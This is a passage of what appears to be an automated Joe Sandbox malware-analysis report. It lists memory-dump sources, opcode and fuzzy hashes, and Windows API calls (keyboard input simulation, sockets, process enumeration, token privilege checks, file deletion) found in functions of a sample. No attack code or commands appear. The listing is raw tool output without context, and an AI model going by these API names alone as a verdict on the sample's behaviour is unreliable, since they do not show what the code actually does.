                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: ccc4ace5d08950e22b6eb0a3aefb0b0c655ee4dac0cb23f42b93f052a52f653c
                                          • Instruction ID: 6399781c05faeb710913fd291336bf98174b48becd3be6d9a6767eb05015e90d
                                          • Opcode Fuzzy Hash: ccc4ace5d08950e22b6eb0a3aefb0b0c655ee4dac0cb23f42b93f052a52f653c
                                          • Instruction Fuzzy Hash: 46A15A766047019FCB10DF64C485B2AB7E4BF89764F148859F99A9B3A2CB34ED05CB82
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00992C7C,?), ref: 009576EA
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00992C7C,?), ref: 00957702
                                          • CLSIDFromProgID.OLE32(?,?,00000000,0098FB80,000000FF,?,00000000,00000800,00000000,?,00992C7C,?), ref: 00957727
                                          • _memcmp.LIBCMT ref: 00957748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 3c6d4a12126ab455fb3328e1f0f60dcc0ebdd91009181a998fced04d7604b5bd
                                          • Instruction ID: 37a53d877fba94fac9a55507139c9c7911e26a81e12be0fae18fa44b70ec9020
                                          • Opcode Fuzzy Hash: 3c6d4a12126ab455fb3328e1f0f60dcc0ebdd91009181a998fced04d7604b5bd
                                          • Instruction Fuzzy Hash: 5A810B75A00109EFCB04DFE5D984EEEB7B9FF89315F204558E506AB250DB71AE0ACB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: e3f14eef5205a32fa34a9df8596759f91d67c97a2455a948c5c02d9f1d1093b9
                                          • Instruction ID: 8f09e45aae692d48d3ab0b83780d0545b3f3cd8aa13e66c40e7187775b4d6616
                                          • Opcode Fuzzy Hash: e3f14eef5205a32fa34a9df8596759f91d67c97a2455a948c5c02d9f1d1093b9
                                          • Instruction Fuzzy Hash: 7351A1747043019EDF24EF66D891B2AB3E9AF85311F60D81FE996DB292DA34D8488701
                                          APIs
                                          • GetWindowRect.USER32(0102EC70,?), ref: 00989863
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00989896
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00989903
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: b75c779bef43d6a8e363291fd4f420223f3d28751fd73dfcb5ea02c92e868087
                                          • Instruction ID: 624a6c3f57e29653ffb7b8d11c05ac9df8cf432205b046b39610bdee109d1264
                                          • Opcode Fuzzy Hash: b75c779bef43d6a8e363291fd4f420223f3d28751fd73dfcb5ea02c92e868087
                                          • Instruction Fuzzy Hash: 83510D75A00209AFCF14DF64C884ABE7BB9FF55360F188259F8659B3A0D731AD81DB90
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00959AD2
                                          • __itow.LIBCMT ref: 00959B03
                                            • Part of subcall function 00959D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00959DBE
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00959B6C
                                          • __itow.LIBCMT ref: 00959BC3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: 02fd2df720bc417cc1df33fb2f1715cfd7d9c28f408597301224e0b48f995e08
                                          • Instruction ID: e80ec4e7271f647d5631e8ed8aecb1c083bcb9a25cf39e5066954353314cfec1
                                          • Opcode Fuzzy Hash: 02fd2df720bc417cc1df33fb2f1715cfd7d9c28f408597301224e0b48f995e08
                                          • Instruction Fuzzy Hash: D9417074A00218AFEF11EF55D845BEEBBB9EF84725F000069FD05A7291DB74AE48CB61
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 009769D1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009769E1
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00976A45
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976A51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: f9252f1df48444b53f797d05187efff02e50febb343e8e70aed735c548922601
                                          • Instruction ID: 0fd38d162f1b37570fd1194635e7ea10a482c5659e9b05bd20428b4a98b6fc44
                                          • Opcode Fuzzy Hash: f9252f1df48444b53f797d05187efff02e50febb343e8e70aed735c548922601
                                          • Instruction Fuzzy Hash: A941BF75740600AFEB64AF24CC86F3A77A89F84B14F04C558FA59AF3C3DA709D008B91
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0098F910), ref: 009764A7
                                          • _strlen.LIBCMT ref: 009764D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: aaa6555446a677a21add5ae8e0f9f1a5d274039494538add32c488f46f9d3e79
                                          • Instruction ID: ed7bafa540fa376c1d28d262f422c207dc782b361bc5a022c6ca2fcdb71ec1ab
                                          • Opcode Fuzzy Hash: aaa6555446a677a21add5ae8e0f9f1a5d274039494538add32c488f46f9d3e79
                                          • Instruction Fuzzy Hash: E7418272A00504AFCB14EBA8EC95FBEB7A9AF84310F14C155F9199B2D3EB30AD44DB50
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0096B89E
                                          • GetLastError.KERNEL32(?,00000000), ref: 0096B8C4
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0096B8E9
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0096B915
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: aae8c1356f1c58b94fdf2840502d65a837866c0c26e969afb9f31da97445e234
                                          • Instruction ID: 05579358b09a30819a42ac7fd4616308133abfda9b8e62650170f06a447fb0e8
                                          • Opcode Fuzzy Hash: aae8c1356f1c58b94fdf2840502d65a837866c0c26e969afb9f31da97445e234
                                          • Instruction Fuzzy Hash: 25412539600610DFCB11EF15C484A59BBE5EF8A324F09C098EC4AAB3A2CB30FD41DB91
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009888DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 6da6b6c795bb79a213bfca2444d26e0bcf2317580cf776398bf147e43ee2d34c
                                          • Instruction ID: c632ab3aff918fe1adf1f8700375f23998f6c2ccf6f43e7e5688b90267c526db
                                          • Opcode Fuzzy Hash: 6da6b6c795bb79a213bfca2444d26e0bcf2317580cf776398bf147e43ee2d34c
                                          • Instruction Fuzzy Hash: 7C31F434614109AFEB20BB18CC45FBA77A8EB09350FD44511F921E63E1CE32E9809762
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0098AB60
                                          • GetWindowRect.USER32(?,?), ref: 0098ABD6
                                          • PtInRect.USER32(?,?,0098C014), ref: 0098ABE6
                                          • MessageBeep.USER32(00000000), ref: 0098AC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: d88e758a783a5405c5d0655a0cbe903cc41f2be36420a3e1b845ec9e0c19f196
                                          • Instruction ID: 1d0c8b2779336eaff1aaac0836474cd9c33ff3af59bb9f1259de34a3c77e1f07
                                          • Opcode Fuzzy Hash: d88e758a783a5405c5d0655a0cbe903cc41f2be36420a3e1b845ec9e0c19f196
                                          • Instruction Fuzzy Hash: 6D418D30A04119DFEB11EF58C884B697BF5FF49310F1885AAE895DB361D730E841DB92
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00960B27
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00960B43
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00960BA9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00960BFB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: e37ca539edc888318ddce659c30dd836799f2fa116db0095270366b3a9dedd03
                                          • Instruction ID: 4f7ed5593f94d1416abd1312ccc19d796ba58fa7308a8301ddedce8bab66e71a
                                          • Opcode Fuzzy Hash: e37ca539edc888318ddce659c30dd836799f2fa116db0095270366b3a9dedd03
                                          • Instruction Fuzzy Hash: B5310730944218AEFF308A39CC55BFFBBA9ABC5329F08826AF491521D1C77989549751
                                          APIs
                                          • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00960C66
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00960C82
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00960CE1
                                          • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00960D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 501f7114a31e35453dc269fff7fd11d19565eb9b7fce372e78d510446a26cb4f
                                          • Instruction ID: 683c0ba4bd4250c0262810d4376788cb121e5934701754d74227ede76b3fd57f
                                          • Opcode Fuzzy Hash: 501f7114a31e35453dc269fff7fd11d19565eb9b7fce372e78d510446a26cb4f
                                          • Instruction Fuzzy Hash: 2B3135309403086EFF348B65C864BBFBB6AEBC5320F04471AE4C1521D1C3399955D751
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009361FB
                                          • __isleadbyte_l.LIBCMT ref: 00936229
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00936257
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0093628D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 069e14e4251770006e783fbdb259edf4b78dce1dc27e0a4b2efe6b95e4df9213
                                          • Instruction ID: 892b44e991b5753919710ffaa460e47800b8781a51e646d9b23a12500fb80049
                                          • Opcode Fuzzy Hash: 069e14e4251770006e783fbdb259edf4b78dce1dc27e0a4b2efe6b95e4df9213
                                          • Instruction Fuzzy Hash: 8A31A031604256BFDF218F65CC48BAB7BB9FF42310F168529E864D7191DB31D950DB90
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00984F02
                                            • Part of subcall function 00963641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096365B
                                            • Part of subcall function 00963641: GetCurrentThreadId.KERNEL32 ref: 00963662
                                            • Part of subcall function 00963641: AttachThreadInput.USER32(00000000,?,00965005), ref: 00963669
                                          • GetCaretPos.USER32(?), ref: 00984F13
                                          • ClientToScreen.USER32(00000000,?), ref: 00984F4E
                                          • GetForegroundWindow.USER32 ref: 00984F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 377a4172b206e74f23dfd7214afe1e9d4264016487ad12d7ff9b70236b5547c0
                                          • Instruction ID: cf6092485dfd4c61d8101fd59bd9e7705e703eaca6e6d996e2ffa790e2a844bf
                                          • Opcode Fuzzy Hash: 377a4172b206e74f23dfd7214afe1e9d4264016487ad12d7ff9b70236b5547c0
                                          • Instruction Fuzzy Hash: 7E310F71E00108AFDB00EFB5C885AEFB7F9EF94300F10846AE955E7242DA759E05CBA1
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00963C7A
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00963C88
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00963CA8
                                          • CloseHandle.KERNEL32(00000000), ref: 00963D52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 0a4d5365b9551a9a6aa44c0f4f2e5d2828d64217f0d17ab0d330f1235f88320a
                                          • Instruction ID: e415064407fe76a933ee2f5101ba87b8afba52f9884b55ca55dabfd8e3caf4b5
                                          • Opcode Fuzzy Hash: 0a4d5365b9551a9a6aa44c0f4f2e5d2828d64217f0d17ab0d330f1235f88320a
                                          • Instruction Fuzzy Hash: D9319C711083059FD300EF60D895BAFBBE8EFD5354F50082DF592862E1EB71AA49CB92
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetCursorPos.USER32(?), ref: 0098C4D2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093B9AB,?,?,?,?,?), ref: 0098C4E7
                                          • GetCursorPos.USER32(?), ref: 0098C534
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093B9AB,?,?,?), ref: 0098C56E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 8359fd8b0a7b19871726597dc136ce3269099561d8a7e2b421d547524d53561b
                                          • Instruction ID: 78c6f43f28641e0fb711b6b249e81acfed8fa4234dc19ca8c1e7cd1305029283
                                          • Opcode Fuzzy Hash: 8359fd8b0a7b19871726597dc136ce3269099561d8a7e2b421d547524d53561b
                                          • Instruction Fuzzy Hash: 5131A075614018AFCF25DF58C868EFA7BB9EB49310F044069F9058B3A1C735BD90EBA4
                                          APIs
                                            • Part of subcall function 0095810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00958121
                                            • Part of subcall function 0095810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095812B
                                            • Part of subcall function 0095810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095813A
                                            • Part of subcall function 0095810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00958141
                                            • Part of subcall function 0095810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00958157
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009586A3
                                          • _memcmp.LIBCMT ref: 009586C6
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009586FC
                                          • HeapFree.KERNEL32(00000000), ref: 00958703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: a5292058a513748da9dfd3a0d2aeae5297bce23d5055769527eddfa4525b550d
                                          • Instruction ID: a0d8b4c04ff0b93bb30780c83681d917c3656e5197c24567ac628da3385821fb
                                          • Opcode Fuzzy Hash: a5292058a513748da9dfd3a0d2aeae5297bce23d5055769527eddfa4525b550d
                                          • Instruction Fuzzy Hash: 23217A71E06109EFDB10DFA5C989BEEB7B8EF44306F154059E844BB240DB30AE09DB90
                                          APIs
                                          • __setmode.LIBCMT ref: 009209AE
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          • _fprintf.LIBCMT ref: 009209E5
                                          • OutputDebugStringW.KERNEL32(?), ref: 00955DBB
                                            • Part of subcall function 00924AAA: _flsall.LIBCMT ref: 00924AC3
                                          • __setmode.LIBCMT ref: 00920A1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
